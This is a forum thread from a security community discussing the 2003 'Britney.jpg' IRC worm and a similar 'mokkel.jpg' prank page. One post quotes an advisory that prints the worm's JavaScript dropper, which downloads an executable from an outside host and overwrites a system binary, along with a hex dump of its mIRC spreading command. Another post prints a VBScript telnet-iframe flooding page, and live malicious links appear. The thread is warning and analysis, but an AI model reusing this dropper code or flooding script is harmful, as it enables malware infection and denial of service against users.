Page 1 of 3 123 LastLast
Results 1 to 10 of 24

Thread: Britney Virus

  1. #1
    Senior Member
    Join Date
    Jul 2003
    Posts
    113

    Britney Virus

    Taken from www.ircspy.com

    "Another internet worm was released through IRC networks. The worm is disguised as a .jpg picture named Britney.jpg from Angelfire. Whatever you do do not open britney links in Internet explorer.
    An exploit taking advantage of holes in Internet Explorer along with Windows Media Player ensures the worm free passage to your computer, where it starts deleting system files and destroying the registry.
    The effect of this is: no shortcuts work, no programs, except those already running will work. If mirc is running it will proceed by installing a script that announces the url to britney.jpg in all the channels you have joined. Some have mentioned that it even uploads sites.dat from your FlashFXP directory."

    I got this from someone on IRC, I wouldn't adivse clicking it, although I have heard its already been removed.
    http://www.angelfire.com/celeb2/picsx/britney.jpg

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    1,050
    i seen it the other day when i was floating about in IRC pretty nasty sucks for all the people that will click the link thinking they will still get celeb pron
    By the sacred **** of the sacred psychedelic tibetan yeti ....We\'ll smoke the chinese out
    The 20th century pharoes have the slaves demanding work
    http://muaythaiscotland.com/

  3. #3
    I'm still waiting for my Anna Kournikova pics!!!


  4. #4
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    You think the virrii is bad, buy the dumb bitches CD.

  5. #5
    gore -> u are ****en right, he he he,nicely said......
    Beware, you who seek first and final principles, for you are
    trampling the garden of an angry God and he awaits you just beyond the last theorem.

  6. #6
    Senior Member
    Join Date
    Feb 2002
    Posts
    1,210
    I thinking.. "huh ? wtf ? there is no way you'll get a virus from a jpg"

    but all those people over at ircspy.com are mistaken.. maybe it was britney.jpg.exe
    or .jpg.vbs



    I found this one link which pertains to this.. here

    2003-10-26 15:15 (+0200)


    DO NOT CLICK ON britney.jpg!!!

    Under no circumstances open an URL that ends with britney.jpg. It is actually
    an Internet Explorer / Windows Media Player exploit, as shown below.

    -----
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
    -----

    patch.exe seems to be compressed with UPX, interesting strings can be found within.

    0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
    0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
    0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
    0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
    0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!

    This is a command it sends automatically to mIRC. This causes mIRC to send the
    exploit URL to all channels you are in.

    It will replace/delete Windows system files. If that happens, you might get a
    message of this sort: "Files that are required for Windows to run properly have
    been replaced by unrecognized versions".

    This is NOT the same thing as http://koti.phnet.fi/jonninen/mircworms/britny.txt.


    15:30: At this time I don't know if the worm can be removed. If it manages to delete
    your Windows system files, you'll have to reinstall Windows.


    15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they
    are hosting.


    16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in
    EFnet.

    According to reports, simply "repairing" the Windows install or copying the deleted
    files back isn't enough, since the virus also messes around with the Windows registry.
    You'll have to reinstall Windows.


    16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. :-)


    16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.


    17:00: There's a list of Windows system files in the uncompressed version of patch.exe
    starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,
    userinit.exe, services.exe, etc. There are also references to some anti-virus and
    firewall programs in the immediate vicinity. The virus probably disables these
    programs so that it can roam freely.

    Reports say that the virus does not affect Windows 98, but it definitely affects
    at least Windows 2000 and XP. Anti-virus software does not help you at this point,
    since none of them recognize the virus yet.

    The scavenger.sharewith.us site has been disabled. This prevents the virus from
    infecting machines for now, but the Angelfire page is still up and the author of
    the virus could modify the page to point to another location.

    The IE exploit: http://www.security.nnov.ru/search/d...asp?docid=5102


    17:30: The virus might not affect Windows Media Player version 8. (see
    http://www.kb.cert.org/vuls/id/222044)


    19:10: According to reports, the virus does affect WMP 8 as well. Better not open
    any suspicious links as long as you use IE.

  7. #7
    Senior Member
    Join Date
    Jul 2003
    Posts
    113
    Well I once had a url, it was something.jpg and it somehow flooded the pc that clicked it with telnet sessions. it was something like www.telefragged.nl/personaccouns/mokkel.jpg
    I don't remember exactly, I'll go see if I can find it again.

    UPDATE:
    Here we go...
    http://********fragged.nl/~nander/mokkel.jpg
    Warning, clicking will flood you with telnets, so don't click unless you can safely lose your IE session. My AV picks it up as Trojan.VBS.IFrame (kaspersky)

  8. #8
    Senior Member
    Join Date
    Feb 2002
    Posts
    1,210
    yeah.. it's called a jpg.. but if you right click and do save as.. IE sees it as an html file.

    here's an old article at slahdot that "debunked" the jpg virus theory
    http://features.slashdot.org/feature....shtml?tid=166

    but here is a report that says there is one in the wild.. no real explanation for it. (911.jpg)
    http://www.eweek.com/article2/0%2C41...WMS102049TX1K0

    and another thread that has a few links in it.. about something else.
    http://www.flux.org/pipermail/talk/2...ne/003295.html

    I mean.. I could see a png file coded with php disquised as a jpg.. (like that vipersig that a few were using here reporting your ip.. etc) doing it.. but not a "true jpg"..

    interesting 'tho.. thanks for bringing to our attention, Viper

    edit : out of curiousity.. I grabed that Mokkel file and opened it with notepad..

    here's what was in it :
    <html>
    <body>
    <H1> </H1>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>
    <script type="text/vbscript">
    for a=1 to 800
    document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
    next
    </script>

    </body>
    </html>

  9. #9
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Hi sumdumguy,

    I have seen one .jpg virus, must be 2-3 years ago? a "proof of concept".............it was quite complicated, and a bit of a cheat as I recall?

    "one off", "once off", "run once"............it was called something like that (McAfee definitions I believe)

    I think it used some kind of Steganographic approach, and hid the virus code in a .jpg? it needed to load other stuff to go to the picture to recover the malware code.........any of you guys remember that one?

    I seem to remember that it could only infect the target machine, and not spread any further using .jpg, so it could be used as a distribution tool I suppose.

    Just my badly remembered £0.02

    Cheers
    EDIt it could have been called "onetime"?

  10. #10
    Senior Member
    Join Date
    Feb 2002
    Posts
    1,210
    yea I remember that too, nihil.. and i think we had a few discussions about it here..
    but it couldn't lanuch itself.. like from within a photoeditor or a viewer..

    I'm thinking that like this Mokkel thing.. the britney one just "appears" to be a normal jpg from the name only.. and it's true intentity is an html file..

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •